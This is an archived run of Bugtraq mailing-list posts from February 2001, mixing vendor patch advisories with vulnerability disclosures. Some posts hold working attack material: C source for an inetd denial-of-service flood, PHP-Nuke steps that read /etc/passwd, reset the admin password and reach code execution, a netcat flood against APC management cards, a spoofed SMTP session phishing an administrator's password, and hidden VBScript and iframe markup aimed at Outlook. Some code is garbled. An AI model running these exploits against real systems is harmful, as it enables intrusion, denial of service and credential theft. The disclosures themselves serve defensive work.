Re: Lotus Notes Stored Form Vulnerability

2001-02-26 Thread Katherine Spanbauer

Technote # 184674  QA: BugTraq "Lotus Notes Stored Form Vulnerability"

*  Title: QA: BugTraq "Lotus Notes Stored Form
*  Product Area:   Notes
*  Product Release: Notes Client 5.x, Notes Client 4.6x
*  Topic: Workstation/Desktop \\ Notes Client Functionality
   \\ Security \\ ECL
Document #:184674
Last Update:   02/23/2001


What methods are available to protect against potential attacks using a
Stored Form in a mail message?

   1.  Disable the Stored Form setting for all mail files.


   2.  Use Execution Control Lists (ECLs) to define trusted signers of
 executable content and assign appropriate levels of access.

When were these features introduced?

   The Database Property for "Allow use of stored forms in this database"
   was introduced in Notes R4.1.  The Execution Control List (ECL) feature
   was introduced in Notes R4.5.

What is a "Stored Form" and how is it used?

   When designing a form, a form property can be enabled that will store
   the form design with the document.   The most common usage of this
   feature is when a document will be mailed and the form does not exist in
   the users mail files.  By storing the form with the document, additional
   functionality can be added.  For more information on Forms and
   Documents, please see the Help document included below.

How can the use of a Stored Form be detected for a particular mail message?

   The existence of a $Title field on the document indicates that the form
   is stored with the document.  The $Title field will contain the name of
   the form.

How can Stored Forms be disabled?

   This setting is configured in Database Properties.  To disable it,
   uncheck the box on the Basics tab for "Allow use of stored forms in this

Who has access to change this setting for a database?

   Manager access in the ACL is required to change database properties.

How can administrators disable this setting for all user's mail files?

   Disable the setting on the mail template(s) used in your environment and
   run the Design task (load design from the server console, or as a
   scheduled task).

   When new mail files are created from the template, this setting will be
   disabled.  In addition, when the design task runs (by default, this
   occurs nightly at 2 am), all databases that inherit from the updated
   templates will now have this setting disabled.  This technique assumes
   that mail files inherit their design from a specified template(s), which
   is the default behavior.

If Stored Forms are not enabled for a database, what will happen when the
user opens a mail message containing a stored form?

   The user will be prompted with a dialog box with the following message;
   "This document cannot be displayed in its original format because it
   contains a stored form.  This database does not allow use of stored
   forms.  Notes will attempt to open the document using a different

   The default form for the database will be used to display the document
   instead.  Any code associated with the form will not be executed, and
   some field values may not be able to be read using the default form
   (i.e. the "Memo" form in mail databases).

Where is the Execution Control List (ECL) stored and configured?

   The ECL is stored for each user in their desktop.dsk/desktop5.dsk file.
   Users can access their ECL from File\Preferences\User
   Preferences\Security Options.  Administrators can configure domain wide
   settings in the Public Address Book/Domino Directory by selecting
   Actions\Edit Administration ECL.  Workstation ECLs are inherited from
   the Administration ECL during workstation setup.  In R5.0.5 or higher,
   these settings can be refreshed from the Administration ECL by clicking
   the "Refresh" button on the Workstation Security Options dialog.   The
   use of the @RefreshECL command can also be used in formulas to update a
   user's settings.

How do ECLs protect workstations?

   ECLs rely on the use of digital signatures.  When a design element is
   created and saved, it is signed with the user's private key from their
   ID file.

   When executable code is activated, Notes checks the signature and
   verifies what level of access the signer is allowed for that user's
   workstation.  Notes relies on the use of certificates to verify these
   digital signatures.  If a signer can be verified and is listed in the
   ECL, the rights 

Re: Microsoft Security Bulletin MS01-012

2001-02-26 Thread joelmoses

Hash: SHA1

I think it's worth noting that CVE#CAN-2000-0756 (a problem I
reported to both Bugtraq and Microsoft in August 2000) is a duplicate
of this particular bug, but also includes extra details about vCard

It's worth noting that the field exploited by @stake is the BDAY:
field, and the EMAIL: field is also potentially vulnerable. Several
other fields, including:

- - name:
- - nickname:
- - fn:
- - title:
- - title;language=de;value=text:
- - tel:
- - tel;label:
- - tel;label,label:

can also be used to drive OUTLOOK.EXE to utilize nearly all of the
CPU when given input beyond allocated buffer space.

I don't have the slightest idea why it took this long for the issue
to come to a patch resolution by Microsoft, other than to say their
ideas about disclosure don't necessarily match mine. And that's to
say nothing about @stake not crediting me... but that's water under
the bridge, now isn't it? :

Joel Moses, CISSP
Nashville, TN

Version: PGP Personal Privacy 6.5.1


Re: [TL-Security-Announce] Sendmail-8.11.2-5 TLSA2001003-1

2001-02-26 Thread Kris Kennaway

On Thu, Feb 22, 2001 at 02:09:35PM -0800, [EMAIL PROTECTED] wrote:
Sendmail, launched with the -bt command-line switch, enters its special
"address test" mode. Under these conditions, it is vulnerable to a
segmentation fault which can occur when trying to set a class in ad-
dress test mode due to a negative array index.
 2. Impact
A user can gain root privileges.

This was proven to be wrong - this bug is not believed to have any
security impact.


 PGP signature

Apparent lack of security on IBM Host on Demand

2001-02-26 Thread Jeremy 'Circ' Charles

A major healthcare organization asked my employer's tech support staff to
start using an IBM Host on Demand server to access their hospital's
critical systems to provide support.  While using Ethereal to watch one of
our tech support people use this service, I made a few disturbing

1)  Everything happens in the clear, starting with standard HTTP to
authenticate to the web server and download the java applet that acts as
the terminal emulator front-end for the user.  The user's conversation
with the target server of interest also happens in the clear, including
the user's login name and password.

2)  Outside of using HTTP to serve up the java client, the Host on Demand
server seems to just act as a port forwarder.  You wind up with the java
terminal emulator establishing a TCP connection to an obscure port on the
HoD server, which then simply forwards the connection to the target

3)  After the authorized HoD user establishes the TCP connection to the
HoD server, the HoD server continues to listen for additional connections
on that same obscure port.  It dutifully forwards those additional
connections to the target server.

4)  The HoD server doesn't seem to care where the TCP connections come
from.  Assuming the HoD server is at and the obscure port is
1234, I tried the following from a completely unrelated client machine
elsewhere on the Internet:  "telnet 1234"  Not only did I
connect, but I also immediately got the target machine's banner and login

I'm not sure whether to call this a set of bugs or a serious design flaw.
I don't see anything in the Bugtraq archives with the string "host on
demand."  Has anyone else had experience with this product who can shed
light on whether this is just really poor configuration or a real
brain-dead product when it comes to security?

Jeremy Charles

[CLA-2001:381] Conectiva Linux Security Announcement - sudo

2001-02-26 Thread secure

Hash: SHA1

- --
- --

PACKAGE   : sudo
SUMMARY   : Local buffer overflow
DATE  : 2001-02-26 13:22:00
ID: CLA-2001:381
RELEASES  : 4.0, 4.0es, 4.1, 4.2, 5.0, prg gráficos, ecommerce, 5.1, 6.0

- -

 "sudo" is a program used to delegate superuser privileges to ordinary
 users and only for specific commands.
 There is a buffer overflow vulnerability in sudo which could be used
 by an attacker to obtain higher privileges.

 All sudo users should upgrade the package.

 The problem was reported in sudo's bugzilla by [EMAIL PROTECTED] and
 the author, Todd C. Miller, released an updated version.


 Users of Conectiva Linux version 6.0 or higher may use apt to perform
 upgrades of RPM packages:
 - add the following line to /etc/apt/sources.list if it is not there yet
   (you may also use linuxconf to do this):

 rpm [cncbr] 6.0/conectiva updates

(replace 6.0 with the correct version number if you are not running CL6.0)

 - run: apt-get update
 - after that, execute: apt-get upgrade

 Detailed instructions reagarding the use of apt and upgrade examples
 can be found at

- -
All packages are signed with Conectiva's GPG key. The key and instructions
on how to import it can be found at
Instructions on how to check the signatures of the RPM packages can be
found at
- -
All our advisories and generic update instructions can be viewed at

- -
subscribe: [EMAIL PROTECTED]
unsubscribe: [EMAIL PROTECTED]
Version: GnuPG v1.0.4 (GNU/Linux)
Comment: For info see


inetd DoS exploit

2001-02-26 Thread Serega[linux]

Name:  inetd DoS exploit
Author: Serega[Linux]

[ser@ihg prog]$ ./pscaner -h  /* it's my port scaner */
Open ports on []
[21] OPEN : 220 ihg.localhost FTP server (Version wu-6.6.6(5) Sat Feb 17 15:10:44 MSK 
2001) ready.
[23] OPEN :
[25] OPEN : 220 ihg.localhost ESMTP Sendmail 8.11.0/8.11.0; Sun, 25 Feb 2001 18:58:36 

[ser@ihg prog]$ telnet 21
Connected to
Escape character is '^]'.
220 ihg.localhost FTP server (Version wu-6.6.6(5) Sat Feb 17 15:10:44 MSK 2001) ready.

[ser@ihg prog]$ cc inetddos.c -o inetddos
[ser@ihg prog]$ ./inetddos 21
[ser@ihg prog]$ telnet 21
telnet: Unable to connect to remote host: Connection refused
[ser@ihg prog]$ telnet 23
Connected to
Escape character is '^]'.

[ser@ihg prog]$ ./inetddos 23
[ser@ihg prog]$ telnet 23
telnet: Unable to connect to remote host: Connection refused

 * ICQ: 64432299
 * Home Page:

Inetd DoS exploit bY Serega[Linux]
IHG Project

Usage: ./inetddos host port


[ser@ihg prog]$ ./pscaner -h
Open ports on []
[21] OPEN : 220 ihg.localhost FTP server (Version wu-6.6.6(5) Sat Feb 17 15:10:44 MSK 2001) ready.
[23] OPEN :
[25] OPEN : 220 ihg.localhost ESMTP Sendmail 8.11.0/8.11.0; Sun, 25 Feb 2001 18:58:36 +0300

[ser@ihg prog]$ telnet 21
Connected to
Escape character is '^]'.
220 ihg.localhost FTP server (Version wu-6.6.6(5) Sat Feb 17 15:10:44 MSK 2001) ready.

[ser@ihg prog]$ cc inetddos.c -o inetddos
[ser@ihg prog]$ ./inetddos 21
[ser@ihg prog]$ telnet 21
telnet: Unable to connect to remote host: Connection refused
[ser@ihg prog]$ telnet 23
Connected to
Escape character is '^]'.

[ser@ihg prog]$ ./inetddos 23
[ser@ihg prog]$ telnet 23
telnet: Unable to connect to remote host: Connection refused


#include netdb.h
#include netinet/in.h
#include sys/socket.h
#include sys/types.h
#include time.h
#include signal.h

void time_out(int sig);
int timeout=5;  	
char logo[512];
int sockfd;

DoS (char *host, int port)
unsigned long int ip_addr;
struct sockaddr_in serv;

struct hostent *h;
unsigned long int rv;
serv.sin_family = AF_INET;
if ((h=gethostbyname(host)) == NULL)

serv.sin_addr.s_addr = rv;
serv.sin_port = htons(port);

if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) == -1)
perror ("socket error");

signal(SIGALRM, (void *)time_out);

if (connect (sockfd, (struct sockaddr*)serv, sizeof(serv)) != 0)


void time_out (int sig)

usage(char *h)
printf("--\nInetd DoS exploit bY Serega[Linux]
IHG Project
mailto:[EMAIL PROTECTED]\n--\n");
printf("\nUsage: %s host port\n\n", h);

main(int argc, char **argv)
int i;
if (argc3) usage(argv[0]);

for (i=1; i1000; i++)
DoS(argv[1], atoi(argv[2]));
printf("DoS failed\n");


Yet another hole in PHP-Nuke

2001-02-26 Thread Joao Gouveia


This is yet another security flaw in PHP-Nuke, greatly inpired by RFP
post do bugtraq (

Tested on:
PHP-Nuke v.4.4 (latest version, step-by-step install)
PHP Version 4.0.4pl1

Impact: Any user can gain administrator previleges. Every file that the
webserver has access to, can be read by anyone. Any user can execute
with the previleges of the web server.

Fix: version 4.4.1 has been released, for a quick fix see below

PHP in some functions, like for example fopen(), include(), require(),
ignores everything after a NULL if one is present.
snip php.ini
magic_quotes_gpc = On ; magic quotes for incoming GET/POST/Cookie data
? echo $string?


now, with magic_quotes_gpc turned Off.

The same two tests aplied to an include($string)
magic_quotes_gpc On, output: Warning: Failed opening 'tes\0t' for
magic_quotes_gpc Off, output: Warning: Failed opening 'tes' for
So, everything after the NULL was ignored.

Of course, one that who uses magic_quotes_gpc turned on isn't expecting this
kind of behaviour.
The problem here, as RFP noted in his post to bugtraq, is that PHP-Nuke
uses base64_encode() to encode it's cookies, and the user information.
In this vars there is a interesting one, the theme configuration ( also
pointed out by RFP ). The same thing that makes phpnuke not escape the '
, also makes it not escape the NULL. So, here's an example:
snip of bb_smilies.php (Note: 'bbcode_ref.php' has the same problem)
if ($user) {
$user = base64_decode($user);
$userdata = explode(":", $user);

if ($userdata[9] != '') $themes = "themes/$userdata[9]/theme.php";
else $themes = "themes/$Default_Theme/theme.php";

include ("$themes");

Here's a simple way to get /etc/passwd:
jroberto@spike:~  /bin/echo -e
"1:1:1:1:1:1:1:1:1:../../../../../etc/passwd\000" |uuencode -m f
begin-base64 644 f
jroberto@spike:~  wget
-O target.passwd
jroberto@spike:~  head -n1 target.passwd

And, with a litle imagination, here's another way to change the default
administrator (God) password:
jroberto@spike:~  /bin/echo -e
jroberto@spike:~  uuencode -m lixo lixo2
begin-base64 644 lixo2
jroberto@spike:~  wget
-O test

And here's a simple way to execute arbitrary code on the server ( given that
it's not running in safe_mode and filemanager is working).
After geting administration previleges, go to the admin area and give "God"
superuser privs ( if it isn't enabled ).
Switch to the File Manager area, edit/create/rename your choosen file and
insert your php code there.


Both in bb_smilies.php and bbcode_ref.php change:
if ($userdata[9] != '') $themes = "themes/$userdata[9]/theme.php";
else $themes = "themes/$Default_Theme/theme.php";


if ($userdata[9] != '') $themes = "themes/$userdata[9]/theme.php";
else $themes = "themes/$Default_Theme/theme.php";
if ( !(strstr(basename($themes),"theme.php")) || !(file_exists($themes)) ){
echo "Invalid Theme"; exit;}
include ("$themes");

Best regards,

Joao Gouveia


Trustix Security Advisory - sudo

2001-02-26 Thread Trustix Secure Linux Team


Trustix today released an updated version of the sudo package fixing a
buffer overflow, as announced by the sudo maintainer Todd C. Miller.

Trustix specific: no

cc969c9746bea3ff01470c1eaf3ee415  sudo-1.6.3p6-1tr.i586.rpm

94ae7e6f7cae6ba70b8388b86330e0b3  sudo-1.6.3p6-1tr.i586.rpm

Get these updates at:

Version 1.0 of Trustix Secure Linux did not ship with sudo.

Get these updates at:

People who have downloaded SWUP from our ftp site, can enjoy having
the security updates automatically installed using 'swup --upgrade'.

Get SWUP from:

Check out our mailinglists:

Trustix Security Team

My Getright Unsupervised File Download Vulnerability

2001-02-26 Thread SNS Research

Strumpf Noir Society Advisories
! Public release !

-= My Getright Unsupervised File Download Vulnerability =-

Release date: Monday, February 26, 2001


My GetRight is a free, easy to use member of the Getright download
manager software family for MS Windows. It uses the same method of
"click monitoring" to take over the downloads from your web browser
as the other versions of Getright, but offers much more control and
customization for web sites providing files for downloading.

My Getright is available from vendor Headlight Software's website:


My Getright features an option to customize its look while downloading.
Remote websites can even send the program skins to use during the
session. There exists a problem in the handling of these skin files
that might allow for a malicious website operator to stealthy upload
files to anywhere on a user's system and even overwrite existing ones.

A customized look during a download can easily be created through the
use of a .dld file, which holds the skin-data and which should be
placed in the same directory as the files that are to be downloaded.
This file uses a Windows .INI format with simple fields containing
information about graphics locations, download descriptions etc. By
filling these fields with long strings of random data the client-skin
will be incorrectly parsed, which will cause the GUI to die permanently
while the program itself keeps on downloading. Another effect of this
is that the client will no longer display informative messages of any
kind. If from this point on a file which is queued already exists on a
user's harddrive, the latter will be overwritten without question.

This vulnerability is made worse by the possibility to trick the client
into a directory traversal through the filepath-field of mentioned
customization file. Through utilization of a simple "../" a malicious
website operator can trick the client into (over)writing to any path on
the user's system.


For this example we've configured the My Getright client to download
all files to C:\Downloads and have we created a file in C:\

First we do a regular download, this will kill the client GUI, yet it
will download the file to the designated download directory

Now the client uses our "skin", no messages will be displayed while we
use below url to overwrite the file in C:\ :



Vendor was notified and has verified the problem. A new version (v 1.0b)
has been released which fixes both the directory traversal and
transparant skin problem.


Free sk8! (

SNS Research is rfpolicy (
compliant, all information is provided on AS IS basis.

EOF, but Strumpf Noir Society will return!

APC web/snmp/telnet management card dos

2001-02-26 Thread altomo


APC web/snmp management card

Some APC products such as the symetra offer the option of adding a management
card to allow an admin the ablilty to setup monitoring and notification.  The
card is accessable by snmp, web interface, and telnet.  Itseems that only one
telnet connection is allowed at a time.(problem 1).  The telnet sesssion is
authenticated by a user/password method, if the incorrect combination is
entered 3 times no connections are allowed for the defined lockout time. Min.
1 minute, max 10 minutes. (problem 2)

Problem 1-

  Since only one connection is allowed to the telnet port an admin could be
kept from connecting.  Easy to reproduce.

Problem 2- Lock out period. Lock out periods are a good thing, I really do
like them.  But when no one can connect its a bad thing.  Since the lockout
period can not be set to 0 an attacker could take advantage of this by sending
3 incorrect login attempts to the unit and repeat every 60 secs using the
minimal lockout time.  Even if the admin has lockout set to 10 minutes it will
keep repeating and work when it actually is enabled again.

both of these are easy to reproduce.

problem 1 - cat /dev/zero | nc ip-here 23  (ya ya dirty)
problem 2 - attempt login 3 times, or run script attached.

-Contacting APC -
Contacted APC via email and informed they of what had been found and asked if
this was going to be addressed in the future.  The response received back was:

 "At this time the security on the web card is at its highest level. The only
  other suggestion is to make changes on the firewall."

Well, not really what I wanted to hear but hey why not.  I responded inorder
to try one more time and received the same respone back.


Re: Microsoft Security Bulletin MS01-012

2001-02-26 Thread [EMAIL PROTECTED]

Dear Sir,

Mitigating Factors:

 - There is no means by which a Vcard could be made to open

This is not entirely accurate. If you are in the habit of collecting these
odd things, you will have most certainly uncheck-marked the security warning
a long time ago. In that case it is less than trivial to open the Vcard

img id="Bill_Gates" SRC="" style="VISIBILITY: hidden"
IFRAME id=Compelling style="VISIBILITY: hidden"
SCRIPT language=vbs

Working example:

Yours Sincerely,

Your friend and mine,


Send a cool gift with your E-Card

Re: Sudo version 1.6.3p6 now available (fwd)

2001-02-26 Thread chris


I was rather surprised that Mr. Miller released this without crediting me
for discovering the bug (even though it was pretty trivial =). Basically
there is a command-line overflow in Sudo. Long parameters will cause sudo
to crash after writing a log message.


bash-2.04$ sudo /bin/true `perl -e 'print "A"x1'`
Sorry, try again.
sudo: 1 incorrect password attempt
Segmentation fault

bash-2.04$ sudo /bin/true `perl -e 'print "A"x1'`
chris is not in the sudoers file.  This incident will be reported.
Segmentation fault

bash-2.04$ sudo -V
Sudo version 1.6.3

bash-2.04$ cat /etc/issue

Red Hat Linux release 7.0 (Guinness)
Kernel 2.2.16-22 on an i686

bash-2.04$ rpm -q sudo

I don't think this is easily exploitable, because the EIP register isn't
overwritten, but at least the stack is damaged.

For more details, please see my bug report:

The solution is, of course, to upgrade to version 1.6.3p6.

Ciao, Chris.
   ___ __ _
 / __// / ,__(_)_  | Chris Wilson [EMAIL PROTECTED] | Phone: 01223 503 190 |
/ (_ / ,\/ _/ /_ \ | Tech Director - Caliday Project | RITC (Cambridge) Ltd |
\ _//_/_/_//_/___/ | Unix Systems  Network Engineer | Cambridge CB5 8LA UK |

On Fri, 23 Feb 2001, Gossi The Dog wrote:


 -- Forwarded message --
 Date: Thu, 22 Feb 2001 08:52:56 -0700
 From: Todd C. Miller [EMAIL PROTECTED]
 Subject: Sudo version 1.6.3p6 now available

 Sudo version 1.6.3p6 is now available (ftp sites listed at the end).
 This fixes a *buffer overflow* in sudo which is a potential security
 problem.  I don't know of any exploits that currently exist but I
 suggest that you upgrade none the less.

 Sudo has a good track record wrt secure coding, but this one slipped
 by me.

  - todd


The Simple Server HTTPd Directory Traversal

2001-02-26 Thread slipy


The Simple Server is a User-Friendly Web Server 
that handles HTTP requests. It is Windows based 
and extremely convenient to configure and is coded 
in Java. It requires the Java Runtime Environment 
package in order for the program to be able to 
execute. Please note this program isn't the same as 
AnalogX's "Simple Server". This program was 
originally called Free Java Server but has sense been
changed to "The Simple Server".

The Vendors website is:

Download Package at:

Problem: Simple Directory Traversal

Adding the string "/../" to an URL allows an attacker to 
view any file on the server provided you know where 
the file is at in the first place. 

^^ = Will obviously open the Scandisk.log file.

Note: The ../'s depend on where the httpd is installed 
and what file you are attempting to view. 


Vendor has been contacted. Waiting for a reply.

b10z HTTPd advisory.

February 23rd, 2001.

Re: [TL-Security-Announce] Sendmail-8.11.2-5 TLSA2001003-1

2001-02-26 Thread Claus Assmann

On Thu, Feb 22, 2001, [EMAIL PROTECTED] wrote:

I've sent yesterday an e-mail to [EMAIL PROTECTED] but got
no reply up to now. So I'll try it here.

 Vulnerable Packages: All versions previous to 8.11.2-5
 Date: 02/21/2001 5:00 PDT

 TurboLinux Advisory ID#:  TLSA2001003-1

 2. Impact
A user can gain root privileges.

Does TurboLinux have any proof for this claim or is it just a guess?
If the former: why has [EMAIL PROTECTED] not been contacted?
If the latter: why isn't this explicitly stated here?

BTW: Another advisory (TLSA213-1) from TurboLinux also made a
wrong claim about sendmail. It would be nice to be more careful.

PS: The segfault problem has been fixed in 8.11.2 as the RELEASES_NOTES
clearly say.

 PGP signature

Immunix OS 6.2 Security updates for php, dump, and lpr

2001-02-26 Thread Greg KH

Immunix OS Security Advisory

Packages updated:   php, dump, lpr
Affected products:  Immunix OS 6.2
Bugs Fixed: immunix/1327
Date:   February 26, 2001
Advisory ID:IMNX-2001-62-002-01
Author: Greg Kroah-Hartman [EMAIL PROTECTED]

  WireX was recently notified that three packages had not been updated
  for which there had been security updates for in the past.  We regret
  this error, and thank Mario Lorenz for notifying us of this.

  The dump package shipped with Immunix OS 6.2 had setuid bits set on
  it.  Also a buffer overflow was found in dump, but was stopped by
  StackGuard.  A new package has been released.

  The lpr package shipped with Immunix OS 6.2 had a format string
  security bug, a potential race condition, and a few LPRng
  compatibility issues.  A new package has been released fixing these
  The php3 package shipped with Immunix OS 6.2 had a number of logic
  bugs, which this 3.0.18 release should solve.

Package names and locations:
  Precompiled binary packages for Immunix 6.2 are available at:

  Source packages for Immunix 6.2 are available at:

md5sums of the packages:
  910d99fedbdc98920c9eac3009e4b701  RPMS/dump-0.4b19-5.6x_StackGuard.i386.rpm
  e16624080196103d0f12708548ad8ff4  RPMS/dump-static-0.4b19-5.6x_StackGuard.i386.rpm
  84679604e26208e702d7ab6679e6204d  RPMS/rmt-0.4b19-5.6x_StackGuard.i386.rpm
  2a629d1d5c8d796acc1a69288f702bc0  RPMS/lpr-0.50-7.6.x_StackGuard.i386.rpm
  2e44623464733c91091100e2a61c6c5e  RPMS/php-3.0.18-1.6.x_StackGuard.i386.rpm
  c7eeffb9782db48201978991ac893155  RPMS/php-imap-3.0.18-1.6.x_StackGuard.i386.rpm
  cb6682aab19a64b0f325c8c5ad753f1c  RPMS/php-ldap-3.0.18-1.6.x_StackGuard.i386.rpm
  92e2469b2a53eed5170e9afaf514ce1f  RPMS/php-manual-3.0.18-1.6.x_StackGuard.i386.rpm
  cd7f34a91b0452514b5af50d3401ed3b  RPMS/php-pgsql-3.0.18-1.6.x_StackGuard.i386.rpm
  5d3e250426e15e5648aec947a16883b2  SRPMS/dump-0.4b19-5.6x_StackGuard.src.rpm
  ae7431f8a6677a682e1b0fc52a08ccb1  SRPMS/lpr-0.50-7.6.x_StackGuard.src.rpm
  ea4b490547db00905866c07e331dd6ff  SRPMS/php-3.0.18-1.6.x_StackGuard.src.rpm

Online version of all Immunix 6.2 updates and advisories:

  Ibiblio is graciously mirroring our updates, so if the links above are
  slow, please try:
  or one of the many mirrors available at:

 PGP signature

Re: [Fwd: FirstClass Internetgateway stupidity]

2001-02-26 Thread QA-List


Thank you for bringing this matter to our attention.  At Centrinity, we take
pride in the security of our FirstClass software, and therefore take these
reports very seriously.

It is important to note that this method could not be used to extract sensitive
information outside of an FC system because the reply never goes back out to
the internet.  For example, if an internet user uses this method to spoof the
Administrator and requests a password, the reply would not go back to the
internet user, it would go to the real Admin (if it goes anywhere at all).

Nevertheless, this is a serious bug that could be exploited for malicious
purposes, or at the very least could cause disruption on a FirstClass system.

We have fixed this in the next release of FirstClass Internet Services.


Jim Gelcer
Senior QA Analyst, Centrinity Inc.
905.415.7122 (Unified Communications - Voice/Fax)
Visit us at | [EMAIL PROTECTED]

The email gateway included in FirstClass 5.50 can be tricked into
sending mail appearing to the users of the firstclass system as coming
from a local user on the server, including a priviliged user. Doing a
manual sending to the stmp-server specifying username_on_system as the
origin of the email will do but will be caught by the server
spamfilters, either discarding them or adding "Spam:" to the topic
depending on configuration. The requierment for a default configured
server not to view incoming mails as spam seems to be the presence of a
@ in the From: header line. Using a bogus address including an @
outside of the  in the From: field and adding the shorthand adress
form @, which is expanded by the server to the adress specified with
MAIL FROM: during earlier smtp transaction will be delivered and marked
as coming from the specified user. The expanding behaviour is correct
iirc, not validating the origin (at all) is the problem.

220 FirstClass ESMTP Mail Server v5.50 ready
250 Admin... Sender ok
250 [EMAIL PROTECTED] Recipient ok
354 Send your message, end with CRLF.CRLF
From: evil@socialengineer @
Subject: Gimme you password

Preferably now!
250 F1FEEACC Message accepted, transient identifier was 20

The above message will appear to user as a message from the local admin.
The ways to spot the message is in the firstclass "History" function
which specifies the mail as "Created by Admin" and "Routed from" an ip
adress, which normally does not exist. It's also spottable when the
headers, not shown by default, are viewed and that the info for the
Admin user is not opened correctly when accessed from that message.
Works on both Windows and MacOS versions of the server.
  //Mattias From

[slackware-security] buffer overflow in sudo fixed

2001-02-26 Thread Slackware Security Team

Sudo 1.6.3p6 is now available for Slackware 7.1 and Slackware -current.
This release fixes a known buffer overflow, which could be used by
malicious users to compromise parts of the system.  If you rely on Sudo
and use one of the above versions of Slackware, it is recommended that you
upgrade to the new sudo.tgz package for the version you're running.

Detailed information about Sudo can be obtained from the official web

 sudo 1.6.3p6 AVAILABLE - (sudo.tgz)

  A buffer overflow exists in the version of Sudo in Slackware 7.1 and
  -current.  Upgrading to sudo 1.6.3p6 addresses this problem.  Packages

 For Slackware -current:

 For Slackware 7.1:

  For verification purposes, we provide the following checksums:

 For Slackware -current:
16-bit "sum" checksum:
06790   118   sudo.tgz

128-bit MD5 message digest:
54eb7f61b7e7ef17a204af6369218d7d  sudo.tgz

 For Slackware 7.1:
16-bit "sum" checksum:
02323   118   sudo.tgz

128-bit MD5 message digest:
8e5453142a9beab02384d26a323273eb  sudo.tgz

  Make sure that no one is running sudo.  Backup any configuration files
  for sudo, then run this command as root:

 # upgradepkg sudo.tgz

  Thew version will be installed on the system and the old one will be

Remember, it's also a good idea to backup configuration files before
upgrading packages.

- Slackware Linux Security Team

| Send an email to [EMAIL PROTECTED] with this text in the body of |
| the email message: |
|   unsubscribe slackware-security   |
| You will get a confirmation message back.  Follow the instructions to  |
| complete the unsubscription.  Do not reply to this message to  |
| unsubscribe!   |

Re: Win2k directory services weakness

2001-02-26 Thread Anonymous

There a few other  ways to get to a hack of this sort.  These also assume a 
compromised DC in one domain of a multidomain Forest.

In the organization I work for we have not discovered a satisfactory resolution to 
these exposures.  We may be heading towards the implementation of multiple forests.

Some partial resolutions are as follows:

Use DNProtect to keep site-connection objects secured against access by SYSTEM 
context.  Problem is, you need to rerun DNProtect every time any change occurs to the 
object and it isn't offiially supported.  Additionally, the only published info on 
this utility seems to be a mention of it in "Notes from the Field"

Promote Replica DCs using the Domain Admin of that domain, not  Domain Admin of the 
empty root domain.  This prevents some issues with ownership of objects being marked 
as the BUILTIN\Administrator account.  If ownership is flagged to this account Admins 
in other DCs can manipulate the objects.  This is easy to prevent but runs counter to 
MS's recommendations.

It appears that keeping separate domains from sharing the same sites has some positive 
effect, but that is ridiculous.  Unfortunately, the only means of clearly providing 
the fault isolation one would expect from separate domains appears to actually be 
separate forests.  Maybe we just don't get this product.  It seems fine for smaller 
organizations, or organizations which already use a single centralized group for all 
IT administration.  In a decentralized environment, it appears to demand either a 
change in the administrative structure or separate forests.

security bulletins digest (fwd)

2001-02-26 Thread Ben Greenbaum

-- Forwarded message --
Date: Mon, 26 Feb 2001 03:46:38 -0800 (PST)
From: IT Resource Center [EMAIL PROTECTED]
Subject: security bulletins digest

HP Support Information Digests

o  IT Resource Center World Wide Web Service

   If you subscribed through the IT Resource Center and would
   like to be REMOVED from this mailing list, access the
   IT Resource Center on the World Wide Web at:

   Login using your IT Resource Center User ID and Password.
   Then select Support Information Digests (located under
   Maintenance and Support).  You may then unsubscribe from the
   appropriate digest.

Digest Name:  daily security bulletins digest
Created:  Mon Feb 26  3:00:04 PST 2001

Table of Contents:

Document ID  Title
---  ---
HPSBUX0012-135   Sec. Vulnerability in kermit(1) REVISED01

The documents are listed below.

Document ID:  HPSBUX0012-135
Date Loaded:  20010225
  Title:  Sec. Vulnerability in kermit(1) REVISED01

Last Revised: 23 Feb. '01
The information in the following Security Bulletin should be
acted upon as soon as possible.  Hewlett-Packard Company will
not be liable for any consequences to any customer resulting
from customer's failure to fully implement instructions in
this Security Bulletin as soon as possible.
ISSUE:  Kermit communications software contains a buffer overflow.

PLATFORM:  HP9000 Series 700 and 800 running HP-UX releases 11.00,
   10.20, 10.10 and 10.01.

POSSIBLE RESULT: Users could compromise system availability.

   Apply patches for HP-UX releases as follows:
 for 11.00:   PHCO_22665,
   ---10.20:   PHCO_23319,
   ---10.10:   PHCO_23320,
   ---10.01:   PHCO_23321.

AVAILABILITY: The patches are available now.
CHANGE SUMMARY: Patches for 10.X are built on current code base.
A. Background
   Hewlett-Packard Company has become aware of a defect in the
   Kermit communications software supplied with its operating system
   in various releases.

B. Fixing the problem *REVISED01*
   The problem can be fully resolved by applying the appropriate
   patches to the system. For HP-UX releases
 11.00:   PHCO_22665,
   ---10.20:   PHCO_23319,
   ---10.10:   PHCO_23320,
   ---10.01:   PHCO_23321.

   While this patch does not require a reboot, appropriately
   terminating any instances of Kermit before installation of the
   patch will assure that continued operation with Kermit is now
   with the patched binaries.

C. To subscribe to automatically receive future NEW HP Security
   Bulletins from the HP IT Resource Center via electronic mail,
   do the following:

   Use your browser to get to the HP IT Resource Center page

   Under the Maintenance and Support Menu (Electronic Support
   Center):  click on the "more..." link.  Then -

   Use the 'Login' tab at the left side of the screen to login
   using your ID and password.  Check with your system
   administrator to see if you have an existing login or use
   the "Register" button at the left to create a login.  You
   will need to login in order to gain access to many areas of
   the ITRC. Remember to save the User ID assigned to you, and
   your password.

   Under the Maintenance and Support Menu, click on the "more..."
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   To -subscribe- to future HP Security Bulletins or other
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   To -review- bulletins already released, select the link
   (in the middle column) for the appropriate digest.

   To -gain access- to the Security Patch Matrix, select
   the link for "hp security bulletins archive" near the bottom.
   Once in the archive the top link is 

Re: Advisory: Chili!Soft ASP Multiple Vulnerabilities

2001-02-26 Thread John Brock

There have been various issues related to security 
brought to the attention of Chili!Soft.

While we are working as quickly as possible to 
address the more detailed issues, we 
would like to provide as much information as possible 
on the current status to help 
remove as much exposure as possible in the short 
term.  Chili!Soft is dedicated to 
providing a safe, secure environment for both our 
customers and their clients.

There have been 4 specific issues presented to us.  
We will cover each in their own 
section below.

1)  Issue:  Chili!Soft ASP installs a default username 
and password for the ASP Admin 
Console when you choose to install using 
the "default" installation.

Solution:  The Admin console username and 
password can be changed by telneting to 
the machine and running the "admtool" utility.  You 
must be root to run this utility.  Once 
the utility is started, you can list the existing users, 
delete, and/or add additional users.  
It is always strongly advisable to remove any default 
settings as quickly as possible.

Note:  By choosing the "custom" installation method, 
instead of the default, you will be 
prompted for the ASP Admin console username and 

Software Versions Affected:  Linux 3.5.2, AIX 3.6

2)   Issue:  Chili!Soft ASP sample applications 
contain the ability to view the source of 
